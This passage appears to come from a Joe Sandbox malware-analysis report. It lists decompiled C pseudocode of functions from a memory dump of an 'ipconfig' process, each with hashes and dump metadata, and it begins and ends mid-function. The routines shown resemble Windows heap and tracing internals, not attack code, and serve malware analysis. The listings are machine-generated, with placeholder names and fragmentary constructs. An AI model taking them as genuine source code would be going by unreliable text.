              				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
              				_v24 = __edx;
              				_v12 = 0;
              				if((_t81 & 0x01000000) != 0) {
              					L5:
              					if(_a8 != 0) {
              						_t81 = _t81 | 0x00000008;
              					}
              					_t57 = E02F5ABF4(_t55 + _t75, _t81);
              					_v8 = _t57;
              					if(_t57 < _t75 || _t75 > 0x7fffffff) {
              						_t76 = 0;
              						_v16 = _v16 & 0;
              					} else {
              						_t59 = _t53;
              						_t76 = E02F5AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
              						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
              							_t47 = E02F5AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
              							_t61 = _v20;
              							if(_t61 != 0) {
              								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
              								if(E02F3CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
              									L02EB77F0(_t53, 0, _t76);
              									_t76 = 0;
              								}
              							}
              						}
              					}
              					_t82 = _v8;
              					L16:
              					if(E02EB7D50() == 0) {
              						_t37 = 0x7ffe0380;
              					} else {
              						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
              					}
              					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
              						E02F5131B(_t53, _t76, _t82, _v16);
              					}
              					return _t76;
              				}
              				_t51 =  *(__ecx + 0x20);
              				_v20 = _t51;
              				if(_t51 == 0) {
              					goto L5;
              				}
              				_t81 = _t81 | 0x00000008;
              				if(E02F3CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
              					_t55 = _v12;
              					goto L5;
              				} else {
              					_t82 = 0;
              					_t76 = 0;
              					_v16 = _v16 & 0;
              					goto L16;
              				}
              			}

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
              • Instruction ID: 6a0a26c3343ce0ee44edf95f1d8bcf1f403444c65f3abf492472c7ee6ece6ce1
              • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
              • Instruction Fuzzy Hash: E5311532F009647BDB158B65CC44BAFFBABEF80390F058169EF04A7281DB709D20CA90
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 76%
              			E02F5FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
              				char _v8;
              				signed int _v12;
              				signed int _t29;
              				char* _t32;
              				char* _t43;
              				signed int _t80;
              				signed int* _t84;
              
              				_push(__ecx);
              				_push(__ecx);
              				_t56 = __edx;
              				_t84 = __ecx;
              				_t80 = E02F5FD4E(__ecx, __edx);
              				_v12 = _t80;
              				if(_t80 != 0) {
              					_t29 =  *__ecx & _t80;
              					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
              					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
              						E02F60A13(__ecx, _t80, 0, _a4);
              						_t80 = 1;
              						if(E02EB7D50() == 0) {
              							_t32 = 0x7ffe0380;
              						} else {
              							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
              						}
              						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
              							_push(3);
              							L21:
              							E02F51608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
              						}
              						goto L22;
              					}
              					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
              						_t80 = E02F62B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
              						if(_t80 != 0) {
              							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
              							_t77 = _v8;
              							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
              								E02F5C8F7(_t66, _t77, 0);
              							}
              						}
              					} else {
              						_t80 = E02F5DBD2(__ecx[0xb], _t74, __edx, _a4);
              					}
              					if(E02EB7D50() == 0) {
              						_t43 = 0x7ffe0380;
              					} else {
              						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
              					}
              					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
              						goto L22;
              					} else {
              						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
              						goto L21;
              					}
              				} else {
              					_push(__ecx);
              					_push(_t80);
              					E02F5A80D(__ecx[0xf], 9, __edx, _t80);
              					L22:
              					return _t80;
              				}
              			}

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
              • Instruction ID: 344c201f6530cbcc0c1f72ea121b4ecd89bb589f4d7540910d8aae6eee85a05b
              • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
              • Instruction Fuzzy Hash: 9631E7327006506FD7229768C844F6ABBEAEBC67D4F184698EF4A8BF41DB74D841C710
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 70%
              			E02F5EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
              				signed int _v8;
              				char _v12;
              				intOrPtr _v15;
              				char _v16;
              				intOrPtr _v19;
              				void* _v28;
              				intOrPtr _v36;
              				void* __ebx;
              				void* __edi;
              				signed char _t26;
              				signed int _t27;
              				char* _t40;
              				unsigned int* _t50;
              				intOrPtr* _t58;
              				unsigned int _t59;
              				char _t75;
              				signed int _t86;
              				intOrPtr _t88;
              				intOrPtr* _t91;
              
              				_t75 = __edx;
              				_t91 = __ecx;
              				_v12 = __edx;
              				_t50 = __ecx + 0x30;
              				_t86 = _a4 & 0x00000001;
              				if(_t86 == 0) {
              					E02EB2280(_t26, _t50);
              					_t75 = _v16;
              				}
              				_t58 = _t91;
              				_t27 = E02F5E815(_t58, _t75);
              				_v8 = _t27;
              				if(_t27 != 0) {
              					E02E9F900(_t91 + 0x34, _t27);
              					if(_t86 == 0) {
              						E02EAFFB0(_t50, _t86, _t50);
              					}
              					_push( *((intOrPtr*)(_t91 + 4)));
              					_push( *_t91);
              					_t59 =  *(_v8 + 0x10);
              					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
              					_push(0x8000);
              					_t11 = _t53 - 1; // 0x0
              					_t12 = _t53 - 1; // 0x0
              					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
              					E02F5AFDE( &_v12,  &_v16);
              					asm("lock xadd [eax], ecx");
              					asm("lock xadd [eax], ecx");
              					E02F5BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
              					_t55 = _v36;
              					_t88 = _v36;
              					if(E02EB7D50() == 0) {
              						_t40 = 0x7ffe0388;
              					} else {
              						_t55 = _v19;
              						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
              					}
              					if( *_t40 != 0) {
              						E02F4FE3F(_t55, _t91, _v15, _t55);
              					}
              				} else {
              					if(_t86 == 0) {
              						E02EAFFB0(_t50, _t86, _t50);
              						_t75 = _v16;
              					}
              					_push(_t58);
              					_t88 = 0;
              					_push(0);
              					E02F5A80D(_t91, 8, _t75, 0);
              				}
              				return _t88;
              			}

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
              • Instruction ID: fc659322fd8ded89a9bbdc2963fc646527013900090baef8cd803f905d9da928
              • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
              • Instruction Fuzzy Hash: 0C318E76604715ABC719DF24C880A6BB7AAFFC0390F048A2DFA5687641DB34E915CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 69%
              			E02F169A6(signed short* __ecx, void* __eflags) {
              				signed int _v8;
              				signed int _v16;
              				intOrPtr _v20;
              				signed int _v24;
              				signed short _v28;
              				signed int _v32;
              				intOrPtr _v36;
              				signed int _v40;
              				char* _v44;
              				signed int _v48;
              				intOrPtr _v52;
              				signed int _v56;
              				char _v60;
              				signed int _v64;
              				char _v68;
              				char _v72;
              				signed short* _v76;
              				signed int _v80;
              				char _v84;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				void* _t68;
              				intOrPtr _t73;
              				signed short* _t74;
              				void* _t77;
              				void* _t78;
              				signed int _t79;
              				signed int _t80;
              
              				_v8 =  *0x2f8d360 ^ _t80;
              				_t75 = 0x100;
              				_v64 = _v64 & 0x00000000;
              				_v76 = __ecx;
              				_t79 = 0;
              				_t68 = 0;
              				_v72 = 1;
              				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
              				_t77 = 0;
              				if(L02EA6C59(__ecx[2], 0x100, __eflags) != 0) {
              					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
              					if(_t79 != 0 && E02F16BA3() != 0) {
              						_push(0);
              						_push(0);
              						_push(0);
              						_push(0x1f0003);
              						_push( &_v64);
              						if(E02ED9980() >= 0) {
              							E02EB2280(_t56, 0x2f88778);
              							_t77 = 1;
              							_t68 = 1;
              							if( *0x2f88774 == 0) {
              								asm("cdq");
              								 *(_t79 + 0xf70) = _v64;
              								 *(_t79 + 0xf74) = 0x100;
              								_t75 = 0;
              								_t73 = 4;
              								_v60 =  &_v68;
              								_v52 = _t73;
              								_v36 = _t73;
              								_t74 = _v76;
              								_v44 =  &_v72;
              								 *0x2f88774 = 1;
              								_v56 = 0;
              								_v28 = _t74[2];
              								_v48 = 0;
              								_v20 = ( *_t74 & 0x0000ffff) + 2;
              								_v40 = 0;
              								_v32 = 0;
              								_v24 = 0;
              								_v16 = 0;
              								if(E02E9B6F0(0x2e7c338, 0x2e7c288, 3,  &_v60) == 0) {
              									_v80 = _v80 | 0xffffffff;
              									_push( &_v84);
              									_push(0);
              									_push(_v64);
              									_v84 = 0xfa0a1f00;
              									E02ED9520();
              								}
              							}
              						}
              					}
              				}
              				if(_v64 != 0) {
              					_push(_v64);
              					E02ED95D0();
              					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
              					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
              				}
              				if(_t77 != 0) {
              					E02EAFFB0(_t68, _t77, 0x2f88778);
              				}
              				_pop(_t78);
              				return E02EDB640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
              			}

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 390158fc7a5c48a70eb6a5a3f5679b1ee000c3cb2d6c9079229c49a2c576a05f
              • Instruction ID: b7002c382adb3930ce5a8967293a7fbcf66befaaa3efe57253c5ba351bb8c92a
              • Opcode Fuzzy Hash: 390158fc7a5c48a70eb6a5a3f5679b1ee000c3cb2d6c9079229c49a2c576a05f
              • Instruction Fuzzy Hash: 534168B1D40208AFEB24DFA5D940BFEBBF9EF48754F14812AE914A7280DB709945CB50
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 85%
              			E02E95210(intOrPtr _a4, void* _a8) {
              				void* __ecx;
              				intOrPtr _t31;
              				signed int _t32;
              				signed int _t33;
              				intOrPtr _t35;
              				signed int _t52;
              				void* _t54;
              				void* _t56;
              				unsigned int _t59;
              				signed int _t60;
              				void* _t61;
              
              				_t61 = E02E952A5(1);
              				if(_t61 == 0) {
              					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
              					_t54 =  *((intOrPtr*)(_t31 + 0x28));
              					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
              				} else {
              					_t54 =  *((intOrPtr*)(_t61 + 0x10));
              					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
              				}
              				_t60 = _t59 >> 1;
              				_t32 = 0x3a;
              				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
              					_t52 = _t60 + _t60;
              					if(_a4 > _t52) {
              						goto L5;
              					}
              					if(_t61 != 0) {
              						asm("lock xadd [esi], eax");
              						if((_t32 | 0xffffffff) == 0) {
              							_push( *((intOrPtr*)(_t61 + 4)));
              							E02ED95D0();
              							L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
              						}
              					} else {
              						E02EAEB70(_t54, 0x2f879a0);
              					}
              					_t26 = _t52 + 2; // 0xddeeddf0
              					return _t26;
              				} else {
              					_t52 = _t60 + _t60;
              					if(_a4 < _t52) {
              						if(_t61 != 0) {
              							asm("lock xadd [esi], eax");
              							if((_t32 | 0xffffffff) == 0) {
              								_push( *((intOrPtr*)(_t61 + 4)));
              								E02ED95D0();
              								L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
              							}
              						} else {
              							E02EAEB70(_t54, 0x2f879a0);
              						}
              						return _t52;
              					}
              					L5:
              					_t33 = E02EDF3E0(_a8, _t54, _t52);
              					if(_t61 == 0) {
              						E02EAEB70(_t54, 0x2f879a0);
              					} else {
              						asm("lock xadd [esi], eax");
              						if((_t33 | 0xffffffff) == 0) {
              							_push( *((intOrPtr*)(_t61 + 4)));
              							E02ED95D0();
              							L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
              						}
              					}
              					_t35 = _a8;
              					if(_t60 <= 1) {
              						L9:
              						_t60 = _t60 - 1;
              						 *((short*)(_t52 + _t35 - 2)) = 0;
              						goto L10;
              					} else {
              						_t56 = 0x3a;
              						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
              							 *((short*)(_t52 + _t35)) = 0;
              							L10:
              							return _t60 + _t60;
              						}
              						goto L9;
              					}
              				}
              			}

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0237808abfc122d212b45618a490ac4a62eb80b02ee41677fb9d05711aeb0284
              • Instruction ID: 9893b44c3a481376c6c193c431a075bcb59f065f2de1700133f9d49d50117ae4
              • Opcode Fuzzy Hash: 0237808abfc122d212b45618a490ac4a62eb80b02ee41677fb9d05711aeb0284
              • Instruction Fuzzy Hash: D9314A322C1600DBCB32AB14CC51B76B7B6FF00764F51E62AF5190B595D732F800CA90
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 78%
              			E02ECA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
              				intOrPtr _t35;
              				intOrPtr _t39;
              				intOrPtr _t45;
              				intOrPtr* _t51;
              				intOrPtr* _t52;
              				intOrPtr* _t55;
              				signed int _t57;
              				intOrPtr* _t59;
              				intOrPtr _t68;
              				intOrPtr* _t77;
              				void* _t79;
              				signed int _t80;
              				intOrPtr _t81;
              				char* _t82;
              				void* _t83;
              
              				_push(0x24);
              				_push(0x2f70220);
              				E02EED08C(__ebx, __edi, __esi);
              				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
              				_t79 = __ecx;
              				_t35 =  *0x2f87b9c; // 0x0
              				_t55 = L02EB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
              				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
              				if(_t55 == 0) {
              					_t39 = 0xc0000017;
              					L11:
              					return E02EED0D1(_t39);
              				}
              				_t68 = 0;
              				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
              				 *(_t83 - 4) =  *(_t83 - 4) & 0;
              				_t7 = _t55 + 8; // 0x8
              				_t57 = 6;
              				memcpy(_t7, _t79, _t57 << 2);
              				_t80 = 0xfffffffe;
              				 *(_t83 - 4) = _t80;
              				if(0 < 0) {
              					L14:
              					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
              					L20:
              					L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
              					_t39 = _t81;
              					goto L11;
              				}
              				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
              					_t81 = 0xc000007b;
              					goto L20;
              				}
              				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
              					_t59 =  *((intOrPtr*)(_t83 + 8));
              					_t45 =  *_t59;
              					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
              					 *_t59 = _t45 + 1;
              					L6:
              					 *(_t83 - 4) = 1;
              					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
              					 *(_t83 - 4) = _t80;
              					if(_t68 < 0) {
              						_t82 =  *((intOrPtr*)(_t83 + 0xc));
              						if(_t82 == 0) {
              							goto L14;
              						}
              						asm("btr eax, ecx");
              						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
              						if( *_t82 != 0) {
              							 *0x2f87b10 =  *0x2f87b10 - 8;
              						}
              						goto L20;
              					}
              					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
              					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
              					_t51 =  *0x2f8536c; // 0x400568
              					if( *_t51 != 0x2f85368) {
              						_push(3);
              						asm("int 0x29");
              						goto L14;
              					}
              					 *_t55 = 0x2f85368;
              					 *((intOrPtr*)(_t55 + 4)) = _t51;
              					 *_t51 = _t55;
              					 *0x2f8536c = _t55;
              					_t52 =  *((intOrPtr*)(_t83 + 0x10));
              					if(_t52 != 0) {
              						 *_t52 = _t55;
              					}
              					_t39 = 0;
              					goto L11;
              				}
              				_t77 =  *((intOrPtr*)(_t83 + 8));
              				_t68 = E02ECA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
              				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
              				if(_t68 < 0) {
              					goto L14;
              				}
              				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
              				goto L6;
              			}

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 04e1f03c9dec3ce22ac3f678449a61e47ff8f297dfa5dae469cf2d4fab8b9d6b
              • Instruction ID: d61ec3d09ad0bb8e9e5ce1c4abb55f6a7ae69e01e2884b746d8cee2a2bfe3a9d
              • Opcode Fuzzy Hash: 04e1f03c9dec3ce22ac3f678449a61e47ff8f297dfa5dae469cf2d4fab8b9d6b
              • Instruction Fuzzy Hash: 39416BB5A40209DFCB05DF98C990BA9BBF2BF49718F25C0ADE914AB385D774A901CF50
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E02ED3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
              				intOrPtr _v8;
              				char _v12;
              				signed short** _t33;
              				short* _t38;
              				intOrPtr* _t39;
              				intOrPtr* _t41;
              				signed short _t43;
              				intOrPtr* _t47;
              				intOrPtr* _t53;
              				signed short _t57;
              				intOrPtr _t58;
              				signed short _t60;
              				signed short* _t61;
              
              				_t47 = __ecx;
              				_t61 = __edx;
              				_t60 = ( *__ecx & 0x0000ffff) + 2;
              				if(_t60 > 0xfffe) {
              					L22:
              					return 0xc0000106;
              				}
              				if(__edx != 0) {
              					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
              						L5:
              						E02EA7B60(0, _t61, 0x2e711c4);
              						_v12 =  *_t47;
              						_v12 = _v12 + 0xfff8;
              						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
              						E02EA7B60(0xfff8, _t61,  &_v12);
              						_t33 = _a8;
              						if(_t33 != 0) {
              							 *_t33 = _t61;
              						}
              						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
              						_t53 = _a12;
              						if(_t53 != 0) {
              							_t57 = _t61[2];
              							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
              							while(_t38 >= _t57) {
              								if( *_t38 == 0x5c) {
              									_t41 = _t38 + 2;
              									if(_t41 == 0) {
              										break;
              									}
              									_t58 = 0;
              									if( *_t41 == 0) {
              										L19:
              										 *_t53 = _t58;
              										goto L7;
              									}
              									 *_t53 = _t41;
              									goto L7;
              								}
              								_t38 = _t38 - 2;
              							}
              							_t58 = 0;
              							goto L19;
              						} else {
              							L7:
              							_t39 = _a16;
              							if(_t39 != 0) {
              								 *_t39 = 0;
              								 *((intOrPtr*)(_t39 + 4)) = 0;
              								 *((intOrPtr*)(_t39 + 8)) = 0;
              								 *((intOrPtr*)(_t39 + 0xc)) = 0;
              							}
              							return 0;
              						}
              					}
              					_t61 = _a4;
              					if(_t61 != 0) {
              						L3:
              						_t43 = L02EB4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
              						_t61[2] = _t43;
              						if(_t43 == 0) {
              							return 0xc0000017;
              						}
              						_t61[1] = _t60;
              						 *_t61 = 0;
              						goto L5;
              					}
              					goto L22;
              				}
              				_t61 = _a4;
              				if(_t61 == 0) {
              					return 0xc000000d;
              				}
              				goto L3;
              			}

















              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6faae59dcccc188d8d307996e84776b8e7aa9f38fcea7f38c60f51e98f10049e
              • Instruction ID: 10fb01cd90a7211e2fc9270be130d9cf39ad599fa872471b9989de335ac8eee6
              • Opcode Fuzzy Hash: 6faae59dcccc188d8d307996e84776b8e7aa9f38fcea7f38c60f51e98f10049e
              • Instruction Fuzzy Hash: 0A31D035A45614DBC7248F29C881A6BBBE5EF46744B05D4AAF945CB390E730D842CF92
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 76%
              			E02F17016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
              				signed int _v8;
              				char _v588;
              				intOrPtr _v592;
              				intOrPtr _v596;
              				signed short* _v600;
              				char _v604;
              				short _v606;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				signed short* _t55;
              				void* _t56;
              				signed short* _t58;
              				signed char* _t61;
              				char* _t68;
              				void* _t69;
              				void* _t71;
              				void* _t72;
              				signed int _t75;
              
              				_t64 = __edx;
              				_t77 = (_t75 & 0xfffffff8) - 0x25c;
              				_v8 =  *0x2f8d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
              				_t55 = _a16;
              				_v606 = __ecx;
              				_t71 = 0;
              				_t58 = _a12;
              				_v596 = __edx;
              				_v600 = _t58;
              				_t68 =  &_v588;
              				if(_t58 != 0) {
              					_t71 = ( *_t58 & 0x0000ffff) + 2;
              					if(_t55 != 0) {
              						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
              					}
              				}
              				_t8 = _t71 + 0x2a; // 0x28
              				_t33 = _t8;
              				_v592 = _t8;
              				if(_t71 <= 0x214) {
              					L6:
              					 *((short*)(_t68 + 6)) = _v606;
              					if(_t64 != 0xffffffff) {
              						asm("cdq");
              						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
              						 *((char*)(_t68 + 0x28)) = _a4;
              						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
              						 *((char*)(_t68 + 0x29)) = _a8;
              						if(_t71 != 0) {
              							_t22 = _t68 + 0x2a; // 0x2a
              							_t64 = _t22;
              							E02F16B4C(_t58, _t22, _t71,  &_v604);
              							if(_t55 != 0) {
              								_t25 = _v604 + 0x2a; // 0x2a
              								_t64 = _t25 + _t68;
              								E02F16B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
              							}
              							if(E02EB7D50() == 0) {
              								_t61 = 0x7ffe0384;
              							} else {
              								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
              							}
              							_push(_t68);
              							_push(_v592 + 0xffffffe0);
              							_push(0x402);
              							_push( *_t61 & 0x000000ff);
              							E02ED9AE0();
              						}
              					}
              					_t35 =  &_v588;
              					if( &_v588 != _t68) {
              						_t35 = L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
              					}
              					L16:
              					_pop(_t69);
              					_pop(_t72);
              					_pop(_t56);
              					return E02EDB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
              				}
              				_t68 = L02EB4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
              				if(_t68 == 0) {
              					goto L16;
              				} else {
              					_t58 = _v600;
              					_t64 = _v596;
              					goto L6;
              				}
              			}























              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a248e405532771072d6f8decd43c3d6e4afde8b9d035a06bec55fd047bb530b3
              • Instruction ID: 9f2b652343d12a1dd5ee0e5132e6336eed5e97c6b92adb3d093f67a551807447
              • Opcode Fuzzy Hash: a248e405532771072d6f8decd43c3d6e4afde8b9d035a06bec55fd047bb530b3
              • Instruction Fuzzy Hash: 8C31B372A047519BC321EF28CC40A6BF3E9BFC8740F444A29F99997690E730E904CBA5
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 68%
              			E02EBC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
              				signed int* _v8;
              				char _v16;
              				void* __ebx;
              				void* __edi;
              				signed char _t33;
              				signed char _t43;
              				signed char _t48;
              				signed char _t62;
              				void* _t63;
              				intOrPtr _t69;
              				intOrPtr _t71;
              				unsigned int* _t82;
              				void* _t83;
              
              				_t80 = __ecx;
              				_t82 = __edx;
              				_t33 =  *((intOrPtr*)(__ecx + 0xde));
              				_t62 = _t33 >> 0x00000001 & 0x00000001;
              				if((_t33 & 0x00000001) != 0) {
              					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
              					if(E02EB7D50() != 0) {
              						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
              					} else {
              						_t43 = 0x7ffe0386;
              					}
              					if( *_t43 != 0) {
              						_t43 = E02F68D34(_v8, _t80);
              					}
              					E02EB2280(_t43, _t82);
              					if( *((char*)(_t80 + 0xdc)) == 0) {
